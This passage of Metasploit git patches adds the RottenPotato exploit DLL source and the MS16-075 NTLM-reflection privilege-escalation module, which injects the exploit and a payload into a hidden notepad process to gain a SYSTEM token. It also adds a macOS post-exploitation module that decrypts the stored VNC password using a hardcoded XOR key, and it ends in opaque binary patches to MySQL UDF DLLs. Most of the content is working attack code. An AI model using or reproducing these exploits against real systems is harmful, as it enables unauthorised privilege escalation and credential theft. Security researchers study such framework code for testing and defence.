_UNICODE_STR +{ + USHORT Length; + USHORT MaximumLength; + PWSTR pBuffer; +} UNICODE_STR, *PUNICODE_STR; + +// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY +//__declspec( align(8) ) +typedef struct _LDR_DATA_TABLE_ENTRY +{ + //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. + LIST_ENTRY InMemoryOrderModuleList; + LIST_ENTRY InInitializationOrderModuleList; + PVOID DllBase; + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STR FullDllName; + UNICODE_STR BaseDllName; + ULONG Flags; + SHORT LoadCount; + SHORT TlsIndex; + LIST_ENTRY HashTableEntry; + ULONG TimeDateStamp; +} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; + +// WinDbg> dt -v ntdll!_PEB_LDR_DATA +typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes +{ + DWORD dwLength; + DWORD dwInitialized; + LPVOID lpSsHandle; + LIST_ENTRY InLoadOrderModuleList; + LIST_ENTRY InMemoryOrderModuleList; + LIST_ENTRY InInitializationOrderModuleList; + LPVOID lpEntryInProgress; +} PEB_LDR_DATA, *PPEB_LDR_DATA; + +// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK +typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes +{ + struct _PEB_FREE_BLOCK * pNext; + DWORD dwSize; +} PEB_FREE_BLOCK, *PPEB_FREE_BLOCK; + +// struct _PEB is defined in Winternl.h but it is incomplete +// WinDbg> dt -v ntdll!_PEB +typedef struct __PEB // 65 elements, 0x210 bytes +{ + BYTE bInheritedAddressSpace; + BYTE bReadImageFileExecOptions; + BYTE bBeingDebugged; + BYTE bSpareBool; + LPVOID lpMutant; + LPVOID lpImageBaseAddress; + PPEB_LDR_DATA pLdr; + LPVOID lpProcessParameters; + LPVOID lpSubSystemData; + LPVOID lpProcessHeap; + PRTL_CRITICAL_SECTION pFastPebLock; + LPVOID lpFastPebLockRoutine; + LPVOID lpFastPebUnlockRoutine; + DWORD dwEnvironmentUpdateCount; + LPVOID lpKernelCallbackTable; + DWORD dwSystemReserved; + DWORD dwAtlThunkSListPtr32; + PPEB_FREE_BLOCK pFreeList; + DWORD dwTlsExpansionCounter; + LPVOID lpTlsBitmap; + DWORD dwTlsBitmapBits[2]; + LPVOID lpReadOnlySharedMemoryBase; + LPVOID lpReadOnlySharedMemoryHeap; + LPVOID lpReadOnlyStaticServerData; + LPVOID lpAnsiCodePageData; + LPVOID lpOemCodePageData; + LPVOID lpUnicodeCaseTableData; + DWORD dwNumberOfProcessors; + DWORD dwNtGlobalFlag; + LARGE_INTEGER liCriticalSectionTimeout; + DWORD dwHeapSegmentReserve; + DWORD dwHeapSegmentCommit; + DWORD dwHeapDeCommitTotalFreeThreshold; + DWORD dwHeapDeCommitFreeBlockThreshold; + DWORD dwNumberOfHeaps; + DWORD dwMaximumNumberOfHeaps; + LPVOID lpProcessHeaps; + LPVOID lpGdiSharedHandleTable; + LPVOID lpProcessStarterHelper; + DWORD dwGdiDCAttributeList; + LPVOID lpLoaderLock; + DWORD dwOSMajorVersion; + DWORD dwOSMinorVersion; + WORD wOSBuildNumber; + WORD wOSCSDVersion; + DWORD dwOSPlatformId; + DWORD dwImageSubsystem; + DWORD dwImageSubsystemMajorVersion; + DWORD dwImageSubsystemMinorVersion; + DWORD dwImageProcessAffinityMask; + DWORD dwGdiHandleBuffer[34]; + LPVOID lpPostProcessInitRoutine; + LPVOID lpTlsExpansionBitmap; + DWORD dwTlsExpansionBitmapBits[32]; + DWORD dwSessionId; + ULARGE_INTEGER liAppCompatFlags; + ULARGE_INTEGER liAppCompatFlagsUser; + LPVOID lppShimData; + LPVOID lpAppCompatInfo; + UNICODE_STR usCSDVersion; + LPVOID lpActivationContextData; + LPVOID lpProcessAssemblyStorageMap; + LPVOID lpSystemDefaultActivationContextData; + LPVOID lpSystemAssemblyStorageMap; + DWORD dwMinimumStackCommit; +} _PEB, *_PPEB; + +typedef struct +{ + WORD offset : 12; + WORD type : 4; +} IMAGE_RELOC, *PIMAGE_RELOC; +//===============================================================================================// +#endif +//===============================================================================================// diff --git a/external/source/exploits/rottenpotato/dllmain.cpp b/external/source/exploits/rottenpotato/dllmain.cpp new file mode 100644 index 0000000000..096e188615 --- /dev/null +++ b/external/source/exploits/rottenpotato/dllmain.cpp @@ -0,0 +1,79 @@ +#include "stdafx.h" +#include "ReflectiveLoader.h" +#include "MSFRottenPotato.h" + +extern "C" HINSTANCE hAppInstance; +EXTERN_C IMAGE_DOS_HEADER __ImageBase; + +HANDLE ElevatedToken; + +VOID ExecutePayload(LPVOID lpPayload) +{ + SetThreadToken(NULL, ElevatedToken); + VOID(*lpCode)() = (VOID(*)())lpPayload; + lpCode(); +} + +int RottenPotato() +{ + CMSFRottenPotato* test = new CMSFRottenPotato(); + test->startCOMListenerThread(); + test->startRPCConnectionThread(); + test->triggerDCOM(); + int ret = 0; + while (true) { + if (test->negotiator->authResult != -1) { + /*Enable the priv if possible*/ + HANDLE hToken; + TOKEN_PRIVILEGES tkp; + + // Get a token for this process. + + if (!OpenProcessToken(GetCurrentProcess(), + TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))return 0; + + // Get the LUID for the Impersonate privilege. + int res = LookupPrivilegeValue(NULL, SE_IMPERSONATE_NAME, + &tkp.Privileges[0].Luid); + + tkp.PrivilegeCount = 1; // one privilege to set + tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; + + // Get the impersonate priv for this process. + res = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0); + + QuerySecurityContextToken(test->negotiator->phContext, &ElevatedToken); + + break; + } + else { + Sleep(500); + } + } + return ret; +} + + +BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) +{ + BOOL bReturnValue = TRUE; + DWORD dwResult = 0; + + switch (dwReason) + { + case DLL_QUERY_HMODULE: + if (lpReserved != NULL) + *(HMODULE *)lpReserved = hAppInstance; + break; + case DLL_PROCESS_ATTACH: + hAppInstance = hinstDLL; + RottenPotato(); + ExecutePayload(lpReserved); + break; + case DLL_PROCESS_DETACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + break; + } + return bReturnValue; +} diff --git a/external/source/exploits/rottenpotato/stdafx.cpp b/external/source/exploits/rottenpotato/stdafx.cpp new file mode 100644 index 0000000000..02ca4e02bb --- /dev/null +++ b/external/source/exploits/rottenpotato/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// MSFRottenPotato.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/external/source/exploits/rottenpotato/stdafx.h b/external/source/exploits/rottenpotato/stdafx.h new file mode 100644 index 0000000000..677e68a9fa --- /dev/null +++ b/external/source/exploits/rottenpotato/stdafx.h @@ -0,0 +1,16 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" + +#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers +// Windows Header Files: +#include + + + +// TODO: reference additional headers your program requires here diff --git a/external/source/exploits/rottenpotato/targetver.h b/external/source/exploits/rottenpotato/targetver.h new file mode 100644 index 0000000000..90e767bfce --- /dev/null +++ b/external/source/exploits/rottenpotato/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include diff --git a/modules/exploits/windows/local/ms16_075_reflection.rb b/modules/exploits/windows/local/ms16_075_reflection.rb new file mode 100644 index 0000000000..077d31fd02 --- /dev/null +++ b/modules/exploits/windows/local/ms16_075_reflection.rb @@ -0,0 +1,124 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/post/windows/reflective_dll_injection' + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Process + include Msf::Post::Windows::FileInfo + include Msf::Post::Windows::ReflectiveDLLInjection + + def initialize(info={}) + super(update_info(info, { + 'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC', + 'Description' => %q{ + Module utilizes the Net-NTLMv2 reflection between DCOM/RPC + to achieve a SYSTEM handle for elevation of privilege. Currently the module + does not spawn as SYSTEM, however once achieving a shell, one can easily + use incognito to impersonate the token. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'FoxGloveSec', # the original Potato exploit + 'breenmachine', # Rotten Potato NG! + 'Mumbai' # Austin : port of RottenPotato for reflection & quick module + ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'Platform' => 'win', + 'SessionTypes' => [ 'meterpreter' ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'none', + }, + 'Targets' => + [ + [ 'Windows x86', { 'Arch' => ARCH_X86 } ], + [ 'Windows x64', { 'Arch' => ARCH_X64 } ] + ], + 'Payload' => + { + 'DisableNops' => true + }, + 'References' => + [ + ['MSB', 'MS16-075'], + ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'], + ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], + ['URL', 'https://github.com/breenmachine/RottenPotatoNG'] + ], + 'DisclosureDate' => 'Jan 16 2016', + 'DefaultTarget' => 0 + })) + end + + def check_arch + os = sysinfo["OS"] + + if sysinfo["Architecture"] =~ /(wow|x)64/i + if session.railgun.kernel32.IsWow64Process(-1, 4)["Wow64Process"] == "\x00\x00\x00\x00" + arch = ARCH_X64 + else + arch = ARCH_X86 + end + elsif sysinfo["Architecture"] == ARCH_X86 + arch = ARCH_X86 + end + + + return arch + end + + def exploit + if is_system? + fail_with(Failure::None, 'Session is already elevated') + end + + + if sysinfo["Architecture"] =~ /wow64/i + fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') + end + + print_status('Launching notepad to host the exploit...') + notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) + begin + process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) + print_good("Process #{process.pid} launched.") + rescue Rex::Post::Meterpreter::RequestError + print_error('Operation failed. Trying to elevate the current process...') + process = client.sys.process.open + end + + print_status("Reflectively injecting the exploit DLL into #{process.pid}...") + architecture = check_arch + if architecture == ARCH_X64 + dll_file_name = 'rottenpotato.x64.dll' + else + dll_file_name = 'rottenpotato.x86.dll' + end + + library_path = ::File.join(Msf::Config.data_directory, "exploits", "rottenpotato", dll_file_name) + library_path = ::File.expand_path(library_path) + + print_status("Injecting exploit into #{process.pid}...") + exploit_mem, offset = inject_dll_into_process(process, library_path) + + print_status("Exploit injected. Injecting payload into #{process.pid}...") + payload_mem = inject_into_process(process, payload.encoded) + + # invoke the exploit, passing in the address of the payload that + # we want invoked on successful exploitation. + print_status('Payload injected. Executing exploit...') + process.thread.create(exploit_mem + offset, payload_mem) + + print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') + end +end + + From e194922855feba4d2eed3dd3032115a641efa162 Mon Sep 17 00:00:00 2001 From: Kevin Gonzalvo Date: Mon, 6 Aug 2018 17:11:42 +0200 Subject: [PATCH 007/192] Add vnc password osx This module show Apple VNC Password from Mac OS X High Sierra. --- modules/post/osx/gather/vnc_password_osx.rb | 50 +++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 modules/post/osx/gather/vnc_password_osx.rb diff --git a/modules/post/osx/gather/vnc_password_osx.rb b/modules/post/osx/gather/vnc_password_osx.rb new file mode 100644 index 0000000000..b1f0c840b2 --- /dev/null +++ b/modules/post/osx/gather/vnc_password_osx.rb @@ -0,0 +1,50 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/auxiliary/report' + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::OSX::Priv + include Msf::Auxiliary::Report + + def initialize(info={}) + super( update_info( info, + 'Name' => 'OS X Display Apple VNC Password', + 'Description' => %q{ + This module show Apple VNC Password from Mac OS X High Sierra. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Kevin Gonzalvo '], + 'Platform' => [ 'osx' ], + 'SessionTypes' => [ "meterpreter", "shell" ] + )) + + end + + def run + case session.type + when /meterpreter/ + host = sysinfo["Computer"] + when /shell/ + host = cmd_exec("hostname") + end + + print_status("Running module against #{host}") + + if is_root? + print_status("This session is running as root!") + print_status("Checking VNC Password...") + exist = cmd_exec("if [ -f /Library/Preferences/com.apple.VNCSettings.txt ];then echo 1; else echo 0; fi;") + if exist == '1' + print_good("Password Found: " + cmd_exec("sudo cat /Library/Preferences/com.apple.VNCSettings.txt | perl -wne 'BEGIN { @k = unpack \"C*\", pack \"H*\", \"1734516E8BA8C5E2FF1C39567390ADCA\"}; chomp; @p = unpack \"C*\", pack \"H*\", $_; foreach (@k) { printf\"%c\", $_ ^ (shift @p || 0) };'")) + else + print_error("The VNC Password has not been found") + end + else + print_error("It is necessary to be root!") + end + end +end \ No newline at end of file From d6a60bd10ea17c587e2f09c670291ece1023e68d Mon Sep 17 00:00:00 2001 From: Kevin Gonzalvo Date: Mon, 6 Aug 2018 17:20:25 +0200 Subject: [PATCH 008/192] remove dependencies removed not necessary dependencies --- modules/post/osx/gather/vnc_password_osx.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/post/osx/gather/vnc_password_osx.rb b/modules/post/osx/gather/vnc_password_osx.rb index b1f0c840b2..c6d2c7feeb 100644 --- a/modules/post/osx/gather/vnc_password_osx.rb +++ b/modules/post/osx/gather/vnc_password_osx.rb @@ -6,9 +6,7 @@ require 'msf/core/auxiliary/report' class MetasploitModule < Msf::Post - include Msf::Post::File include Msf::Post::OSX::Priv - include Msf::Auxiliary::Report def initialize(info={}) super( update_info( info, From 5e7a77dea824276a19e11672a286bd1844d48c09 Mon Sep 17 00:00:00 2001 From: Kevin Gonzalvo Date: Mon, 6 Aug 2018 18:45:24 +0200 Subject: [PATCH 009/192] add new functiom added checking directory of VNC --- modules/post/osx/gather/vnc_password_osx.rb | 24 +++++++++++---------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/modules/post/osx/gather/vnc_password_osx.rb b/modules/post/osx/gather/vnc_password_osx.rb index c6d2c7feeb..3913cb3d6a 100644 --- a/modules/post/osx/gather/vnc_password_osx.rb +++ b/modules/post/osx/gather/vnc_password_osx.rb @@ -7,6 +7,7 @@ require 'msf/core/auxiliary/report' class MetasploitModule < Msf::Post include Msf::Post::OSX::Priv + include Msf::Post::File def initialize(info={}) super( update_info( info, @@ -31,18 +32,19 @@ class MetasploitModule < Msf::Post end print_status("Running module against #{host}") + + unless is_root? + fail_with(Failure::NoAccess, 'It is necessary to be root!') + end + print_status("This session is running as root!") - if is_root? - print_status("This session is running as root!") - print_status("Checking VNC Password...") - exist = cmd_exec("if [ -f /Library/Preferences/com.apple.VNCSettings.txt ];then echo 1; else echo 0; fi;") - if exist == '1' - print_good("Password Found: " + cmd_exec("sudo cat /Library/Preferences/com.apple.VNCSettings.txt | perl -wne 'BEGIN { @k = unpack \"C*\", pack \"H*\", \"1734516E8BA8C5E2FF1C39567390ADCA\"}; chomp; @p = unpack \"C*\", pack \"H*\", $_; foreach (@k) { printf\"%c\", $_ ^ (shift @p || 0) };'")) - else - print_error("The VNC Password has not been found") - end + print_status("Checking VNC Password...") + vncsettings_path = '/Library/Preferences/com.apple.VNCSettings.txt' + if file_exist? vncsettings_path + password = cmd_exec("cat #{vncsettings_path} | perl -wne 'BEGIN { @k = unpack \"C*\", pack \"H*\", \"1734516E8BA8C5E2FF1C39567390ADCA\"}; chomp; @p = unpack \"C*\", pack \"H*\", $_; foreach (@k) { printf\"%c\", $_ ^ (shift @p || 0) };'") + print_good("Password Found: #{password}") else - print_error("It is necessary to be root!") + print_error("The VNC Password has not been found") end end -end \ No newline at end of file +end From 0e8180f263ac679523ea9d5af6739e4998482a4b Mon Sep 17 00:00:00 2001 From: Kevin Gonzalvo Date: Mon, 6 Aug 2018 19:01:32 +0200 Subject: [PATCH 010/192] delete space delete bad spaces --- modules/post/osx/gather/vnc_password_osx.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/osx/gather/vnc_password_osx.rb b/modules/post/osx/gather/vnc_password_osx.rb index 3913cb3d6a..dae448480a 100644 --- a/modules/post/osx/gather/vnc_password_osx.rb +++ b/modules/post/osx/gather/vnc_password_osx.rb @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Post end print_status("Running module against #{host}") - + unless is_root? fail_with(Failure::NoAccess, 'It is necessary to be root!') end From d299831efe21383b46776154aee5fa7097477fe3 Mon Sep 17 00:00:00 2001 From: h00die Date: Tue, 7 Aug 2018 14:50:47 -0400 Subject: [PATCH 011/192] updated windows udf files and documentation --- data/exploits/mysql/lib_mysqludf_sys_32.dll | Bin 6656 -> 6656 bytes data/exploits/mysql/lib_mysqludf_sys_64.dll | Bin 11264 -> 7168 bytes .../exploit/multi/mysql/mysql_udf_payload.md | 4 ++++ 3 files changed, 4 insertions(+) diff --git a/data/exploits/mysql/lib_mysqludf_sys_32.dll b/data/exploits/mysql/lib_mysqludf_sys_32.dll index 0ea90105d438d31209a1c29bb2db6cbe0246f792..2a3ef0e05644cc042d61a78d813c82175dfe7cfe 100755 GIT binary patch delta 3489 zcmYjUX;hQf)_&iNZzf0}Kp+tk2w-KNDi{)Y$>_3Ztu=j?NS?x#Mw zK6-b(IDJFyZCrqx>HiWa_{>Cb^guzq33`VIOxSn0=N%t9t~TM{>8U3Fcl_b^y3gNZ z!#mtmS|oova}SHQf|~*WX&@5#Xz6G!@IJ-?1d9OT0D$Zu-lo`bw(Ro-qY(hGF9(!^ z!RLEH2ErH@0c3G=SR@<*>I%9=>0nHKn~?nN9RkVBINX^BgUb1{c{hj1!_k(Ax!IL8e&H z;9^chk!GqiSipcMqXqyl(rE4H;d_?NG{=YYPVk`+2o8tc;F+l^ZGKk=6j|tPDG2_s^i%ss;lyJ<6v$0D*35Kbuo^dKLfWiV0 zT#oWa^EzzwypbU!!ms(aLZVl?UV6V)yNYaZP_KEk8O7lW!sh~Z@xn(>H(wDUm$IGq zlm4iiTc7as!!%~`k9jomiTX8w(CGfRc3AIa9vDbo2?N4(YSS?0VC}@HhPFn;EEw*e zx_2(-;g7HCvNu3Kal@fn+k+d!eTu~DK{CI2J=itARkAKqn*j;nh+Ac6A06r3KcIk{ z`4s7%2BtgtWh*$m3AIdXR2}{zKuMDGT3WhSO?KQ%e~6S z1F`h6*&~}TGB2Yp(G`N2u1yowLAtnezn5xe9~&2SiE*plHtQL3%yQhRBwJZyBk6DC zXn#L<_-XN6;Y(q@_xcD_<0|EKp)ehl2+yo_Ynul^9VnmbIZ-4|2F4Cj5E%*Z}?B5hBq(NF(FVHGSJ6) znH#q%+2hFweaU$C3};%8HZ36xp`K*pZBFmM+|`%t*#gmRPQeoZxv#dIQ$oo_9-z9{ zyR1~!1>&~{E*)b_nc3XJ^Q2^jGoC zqE!2;=ZlOnB=d{gzdzk!c zqC~>jiVj|RSJ+~=n^;|eF`46kPH`UMdyr4K#*Z63XnD4+VuJA|;~_P8-4@GzB6{)N zBs?E=r;A_&8L2eq{e9-X{Qd+Bq9^9})QBNx%UbFgbOomOyF6u7_AZF#QAvm4u$T8z zYyZ;X%sCM9K4)HwUuUu|=Zt8}fBx{|GsPeI{Vj^6=^GWZKa`^gXekZgnkFHVWuP1i zi%>>gtDJ5O!;DE=y_&jk@~nKz^tS19I7XQf^=H;sA-@Fgt8?XgZiYCh-}*Fx?A~WS zvu@*H%ZpB45HiCL5bifS<`*urZEOX9UVYa3=J}WY?0|^t@CVV6k)7lmbQC<1Z}iBq?2pbtGf| zm;Jqx!v`|?RO1t$HPsR9X(pBM;3p?R(z$%zBw0S!Sg3kEw_~{Hlc$N@{!_=|8j81* z8v7$Q+K%F54xuK*0>fNs(b3+SWV7L*!G|0*jipvT{h3KS63DnPGo`V=jv`Vxvj*(d z4B-T!@fE%nwe>i@cbrU^z6s2Z7_rI*k~gYA1okIvMoS$bmdce>bfr|^4gd+S`<##; zJ2PpbPc%#zw!ji?i9sb(>vcG#Qd1?9GM5{q#jBXg(n68y`l4#KMpvOEiFA;tR9&q3 zAdWWH3AZpSWm;XSM$HTl1*3gZs>@|FHrt~j{RUaJ1Zz~*Fui0 z2CbxmrOmNAiG%c2dwfPUNJ7GATBcf}O0{)Ze3CQV%7%iZE-q@;Joc0*iY_D9({%UyT|oF=zBxpq}6%U2hTxf zSdGVO8-0*$avcR&c#fFOk2Z67B{FQ>Xq&#FX+G`m|UtWS(&zIvD-@vwbeCAlD#^wjk;u6p`oP2 zKBYPxppeVfpU6_n6FV#xi!?%-QoX)hUwU?Zsq!P$2YC|D3od;3$I>(H9xBo(W#jHH z`-m65Eb)k{{PTVP(iXEt?( z_R0W!(IJs^QF*${MeX!xTM^}w%vQ%zR7IdvB`^VlZ-_V0k zV#Yg1)#__nnLkua3Ef_66X^7Zi^^*tcAWjj=CVkuI^Fr6-6ywSqw_3Y zEZ{WgFRP*x0Gh|!O?I_sJcI7;okb0C4}{zTohcL%*%gl^g?iwyXm_HwaUO;tJi#4j zq|w~a7&@9r#$Y`#EHuR#LuFA2(3APG&LCg(3d%APjTe#{ivh5e^R_=AA}$J#BM{MK zEXLhsYHZ2wM2L1H(A-I@(d+uqF5Xm3X*fLk2&NF7mZhUT{7A$|Hbh9lOg~1EQPUi} z8V&|gu@H*EK%js%X`oRBvlh|sw)&R$>pVm(%J_7I=;Au!-U=|C$h~;5h=BNeRH0=` zf(67#6e23dd+NURX0+oI)_|xHyRDLW$`=_=O+>UK7}>%{0Cy9ZG&J<1tb?@<`2JED z#+FYDy-=;k{x4xSG4IXp8QUM1dG8@P^s%nu0w_R(K9xoqJfQ4T-h zhf(?)@Pq^3*2f%qo$}xMpaVbqe|6=1eUbx19lVz#e>nf#qZP!c;^k|UYaFkt{{u79 BXg~k} delta 3693 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 DL>tr1 diff --git a/data/exploits/mysql/lib_mysqludf_sys_64.dll b/data/exploits/mysql/lib_mysqludf_sys_64.dll index 3de734fc9f449952ac1a765c52c58434167a0d6a..773af57df36c0e89dbe3311170da20a606f2b474 100755 GIT binary patch literal 7168 zcmeHMd0bO>w*TGi3n5_-vIPvA3WTM|Dnu495)~CJ6%|4fFq+Ne2Bb)V2Gp3wQk*(= z)Rxw^&a~FST0x{Lhy`h-T5J^!2wK{~1`ultj-YwJuvptS@BKIL^ZuCMC*OO1XT9g1 zdy|};tXN+I@Bjb;gvA2DX-KUrar*ebABLdX*6WNd_>9`+eHsyTd1r2xYB(yjvQRCQ zb3{UgLWyzmB^uQ0p`oJ|KnPq0lGvzaWMsna&04UI*{saKl z`hj}*LLkk6FDv~wudIx0-t;Ld;BhWD>&<^|RRAym?LwzT9C)mOu!s1AT_Us#R%_HE zsG5#d4=D-4*(&&LCC*gqH^F~){}&Yq4~`B6@IHDoxH#&aLGPr)vHgv=F#woMc=`nZ zqyg})$GxW(T@1i7Py_LOZz$6P>U)Wlt~5MAf+pVL<@;cgP#U`?d$VOw@tUwE5K<1Ji)lU^ul@F za8$(dB>e_1ud2~9Zn{aQTAVt(7NXTH0z;41o+aS+D~>ni?ILr6E=KLu@8AY#M!KGa zx1b%Z77#x9^Ko~3YSGQcoOu)9_}oME^q|Y&oYL&94EP?WNJP=wx5`a{|BULvUP6tG z#L<2_KfNsz+W!D-r|R1Zk;7WNfAI 